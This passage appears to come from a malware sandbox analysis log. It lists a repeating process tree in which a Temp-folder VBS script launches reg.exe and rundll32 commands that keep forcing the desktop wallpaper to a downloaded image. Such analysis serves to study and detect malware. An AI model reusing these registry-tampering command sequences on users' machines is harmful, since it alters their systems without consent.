    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\15233.vbs"
        5⤵
        
        PID:5724
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
        5⤵
        
        PID:5712
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
        5⤵
        
        PID:4480
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
        5⤵
        
        PID:1144
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
        5⤵
        
        PID:1608
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:5684
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\15233.vbs"
        5⤵
        
        PID:5664
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
        5⤵
        
        PID:4688
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
        5⤵
        
        PID:2500
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
        5⤵
        
        PID:3676
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
        5⤵
        
        PID:5244
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:5700
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\15233.vbs"
        5⤵
        
        PID:5712
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
        5⤵
        
        PID:3556
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
        5⤵
        
        PID:1484
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
        5⤵
        
        PID:4768
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
        5⤵
        
        PID:5336
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:4632
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\15233.vbs"
        5⤵
        
        PID:5244
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
        5⤵
        
        PID:4920
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
        5⤵
        
        PID:5188
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
        5⤵
        
        PID:4768
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
        5⤵
        
        PID:5760
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:5700
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\15233.vbs"
        5⤵
        
        PID:5064
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
        5⤵
        
        PID:4768
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
        5⤵
        
        PID:1484
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
        5⤵
        
        PID:1780
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
        5⤵
        
        PID:4920
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:1780
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\15233.vbs"
        5⤵
        
        PID:1920
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
        5⤵
        
        PID:4920
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
        5⤵
        
        PID:6160
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
        5⤵
        
        PID:6180
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
        5⤵
        
        PID:6196
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:6216
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\15233.vbs"
        5⤵
        
        PID:6232
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
        5⤵
        
        PID:6244
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
        5⤵
        
        PID:6284
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
        5⤵
        
        PID:6300
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
        5⤵
        
        PID:6312
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:6328
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\15233.vbs"
        5⤵
        
        PID:6352
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
        5⤵
        
        PID:6380
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
        5⤵
        
        PID:6392
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
        5⤵
        
        PID:6412
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
        5⤵
        
        PID:6428
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:6440
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\15233.vbs"
        5⤵
        
        PID:6464
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
        5⤵
        
        PID:6480
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
        5⤵
        
        PID:6508
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
        5⤵
        
        PID:6520
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
        5⤵
        
        PID:6544
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:6556
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\15233.vbs"
        5⤵
        
        PID:6572
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
        5⤵
        
        PID:6592
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
        5⤵
        
        PID:6612
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
        5⤵
        
        PID:6628
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
        5⤵
        
        PID:6652
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:6668
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\15233.vbs"
        5⤵
        
        PID:6688
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
        5⤵
        
        PID:6700
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
        5⤵
        
        PID:6732
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
        5⤵
        
        PID:6744
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
        5⤵
        
        PID:6756
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:6768
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\15233.vbs"
        5⤵
        
        PID:6784
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
        5⤵
        
        PID:6796
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
        5⤵
        
        PID:6820
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
        5⤵
        
        PID:6836
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
        5⤵
        
        PID:6856
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:6872
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\15233.vbs"
        5⤵
        
        PID:6888
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
        5⤵
        
        PID:6896
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
        5⤵
        
        PID:6920
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
        5⤵
        
        PID:6940
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
        5⤵
        
        PID:6952
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:6964
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\15233.vbs"
        5⤵
        
        PID:6980
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
        5⤵
        
        PID:6988
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
        5⤵
        
        PID:7020
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
        5⤵
        
        PID:7036
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
        5⤵
        
        PID:7048
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:7060
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\15233.vbs"
        5⤵
        
        PID:7076
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
        5⤵
        
        PID:7084
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
        5⤵
        
        PID:7116
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
        5⤵
        
        PID:7132
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
        5⤵
        
        PID:7144
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:7156
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\15233.vbs"
        5⤵
        
        PID:6148
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
        5⤵
        
        PID:6160
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
        5⤵
        
        PID:3520
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
        5⤵
        
        PID:6224
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
        5⤵
        
        PID:6248
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:3856
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\15233.vbs"
        5⤵
        
        PID:6304
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
        5⤵
        
        PID:6316
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
        5⤵
        
        PID:6336
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
        5⤵
        
        PID:6388
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
        5⤵
        
        PID:6400
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:6416
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\15233.vbs"
        5⤵
        
        PID:6432
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
        5⤵
        
        PID:6444
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
        5⤵
        
        PID:6484
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
        5⤵
        
        PID:6516
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
        5⤵
        
        PID:6532
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:6548
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\15233.vbs"
        5⤵
        
        PID:6556
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
        5⤵
        
        PID:6616
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
        5⤵
        
        PID:6648
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
        5⤵
        
        PID:6656
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
        5⤵
        
        PID:6652
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:6680
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\15233.vbs"
        5⤵
        
        PID:6716
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
        5⤵
        
        PID:6732
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
        5⤵
        
        PID:6756
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
        5⤵
        
        PID:6800
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
        5⤵
        
        PID:6824
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:2256
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\15233.vbs"
        5⤵
        
        PID:6868
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
        5⤵
        
        PID:6876
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
        5⤵
        
        PID:6900
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
        5⤵
        
        PID:6920
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
        5⤵
        
        PID:6940
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:6952
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\15233.vbs"
        5⤵
        
        PID:6964
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
        5⤵
        
        PID:7024
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
        5⤵
        
        PID:7036
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
        5⤵
        
        PID:7048
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
        5⤵
        
        PID:7068
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:7100
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\15233.vbs"
        5⤵
        
        PID:7136
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
        5⤵
        
        PID:7132
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
        5⤵
        
        PID:6196
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
        5⤵
        
        PID:6228
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
        5⤵
        
        PID:6216
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:4532
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\15233.vbs"
        5⤵
        
        PID:6244
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
        5⤵
        
        PID:2660
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
        5⤵
        
        PID:6384
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
        5⤵
        
        PID:6396
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
        5⤵
        
        PID:6424
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:6456
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\15233.vbs"
        5⤵
        
        PID:6512
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
        5⤵
        
        PID:6516
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
        5⤵
        
        PID:6552
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
        5⤵
        
        PID:6624
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
        5⤵
        
        PID:5044
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:6664
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\15233.vbs"
        5⤵
        
        PID:6668
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
        5⤵
        
        PID:6812
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
        5⤵
        
        PID:6832
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
        5⤵
        
        PID:2512
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
        5⤵
        
        PID:6848
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:6880
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\15233.vbs"
        5⤵
        
        PID:6900
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
        5⤵
        
        PID:6972
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
        5⤵
        
        PID:7032
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
        5⤵
        
        PID:7028
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
        5⤵
        
        PID:7056
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:7072
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\15233.vbs"
        5⤵
        
        PID:7068
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
        5⤵
        
        PID:7128
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
        5⤵
        
        PID:6184
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
        5⤵
        
        PID:6196
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
        5⤵
        
        PID:6228
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:6216
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\15233.vbs"
        5⤵
        
        PID:4532
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
        5⤵
        
        PID:4512
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
        5⤵
        
        PID:6392
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
        5⤵
        
        PID:4184
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
        5⤵
        
        PID:6412
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:6488
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\15233.vbs"
        5⤵
        
        PID:6520
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
        5⤵
        
        PID:6544
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
        5⤵
        
        PID:6628
    - - C:\Windows\system32\reg.exe
        
